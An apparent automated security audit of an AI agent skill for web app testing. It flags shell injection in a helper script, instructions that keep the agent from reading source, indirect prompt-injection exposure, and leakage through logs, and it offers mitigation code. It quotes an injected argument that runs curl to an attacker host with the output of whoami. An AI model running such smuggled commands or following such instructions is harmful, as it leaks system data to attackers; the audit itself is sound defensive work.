webapp-testing

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The helper script scripts/with_server.py calls subprocess.Popen with shell=True to execute commands passed as command-line arguments.
      • Evidence: Line 86 in scripts/with_server.py: process = subprocess.Popen(server['cmd'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).
      • Risk: This allows arbitrary shell command injection if the agent or a user passes malicious input to the --server argument (e.g., "npm run dev; curl http://attacker.com/$(whoami)").
  • [PROMPT_INJECTION] (MEDIUM): The SKILL.md documentation explicitly instructs the agent not to perform its usual safety step of reading source code before execution.
      • Evidence: SKILL.md: "DO NOT read the source until you try running the script first... They exist to be called directly as black-box scripts rather than ingested into your context window."
      • Risk: Although framed as context optimization, this instruction prevents the agent from auditing the logic of the with_server.py script or any generated Playwright scripts, making the agent more likely to execute malicious payloads.
  • [INDIRECT_PROMPT_INJECTION] (LOW): The skill is designed to scrape and interact with web content, which is an untrusted ingestion point.
      • Ingestion points: page.content(), button.inner_text(), and browser console logs in examples/element_discovery.py and examples/console_logging.py.
      • Boundary markers: None identified in the provided examples.
      • Capability inventory: Arbitrary command execution via scripts/with_server.py and file writing to /mnt/user-data/.
      • Sanitization: None; the script prints and saves content retrieved from the browser without filtering.
  • [DATA_EXPOSURE] (LOW): The skill captures browser logs and screenshots and writes them to persistent storage.
      • Evidence: examples/console_logging.py saves data to /mnt/user-data/outputs/console.log.
      • Context: Although this is standard for the tool's purpose, console logs often inadvertently contain sensitive session tokens or PII.
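The COMMAND_EXECUTION finding above can be illustrated with a minimal sketch of one possible mitigation: tokenizing the server command with shlex.split and launching it with shell=False, so that shell metacharacters are passed as literal arguments rather than interpreted. The function names split_command and start_server are hypothetical and are not taken from scripts/with_server.py. This approach also assumes the server command does not depend on shell features such as &&, pipes, or cd, which would stop working.

```python
import shlex
import subprocess


def split_command(cmd: str) -> list[str]:
    """Split a command string into argv tokens without invoking a shell."""
    argv = shlex.split(cmd)
    if not argv:
        raise ValueError("empty server command")
    return argv


def start_server(cmd: str) -> subprocess.Popen:
    """Start the server with shell=False so metacharacters stay literal."""
    return subprocess.Popen(
        split_command(cmd),
        shell=False,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )


# The payload quoted in the audit is reduced to plain arguments for npm;
# no second command and no $(...) substitution is ever executed.
print(split_command("npm run dev; curl http://attacker.com/$(whoami)"))
# ['npm', 'run', 'dev;', 'curl', 'http://attacker.com/$(whoami)']
```

With this change the injected text would most likely cause the server command to fail on unexpected arguments, which is a safer failure mode than running attacker-controlled shell code.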
Recommendations
  • AI detected serious security threats
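As one concrete direction for the DATA_EXPOSURE finding, console output could be redacted before it is written to persistent storage. The sketch below is an assumption, not part of the audited skill: the redact function and its three patterns (bearer tokens, token-like query parameters, email addresses) are hypothetical and would need tuning to the formats an application actually emits.

```python
import re

# Hypothetical patterns for illustration only; real token formats vary.
_PATTERNS = [
    # "Bearer <token>" in logged headers
    (re.compile(r"(?i)(bearer\s+)[A-Za-z0-9._~+/=-]+"), r"\1[REDACTED]"),
    # token=..., session=..., api_key=... in URLs or key/value dumps
    (re.compile(r"(?i)\b((?:token|session|api_key)=)[^\s&;]+"), r"\1[REDACTED]"),
    # email addresses as a simple stand-in for PII
    (re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"), "[EMAIL]"),
]


def redact(line: str) -> str:
    """Return the log line with likely secrets and emails masked."""
    for pattern, replacement in _PATTERNS:
        line = pattern.sub(replacement, line)
    return line


print(redact("GET /cb?token=s3cr3t&x=1"))
# GET /cb?token=[REDACTED]&x=1
```

A function like this could be applied to each console message before it is appended to the log file. Pattern-based redaction reduces accidental exposure but cannot guarantee that every secret is caught.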
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 06:14 PM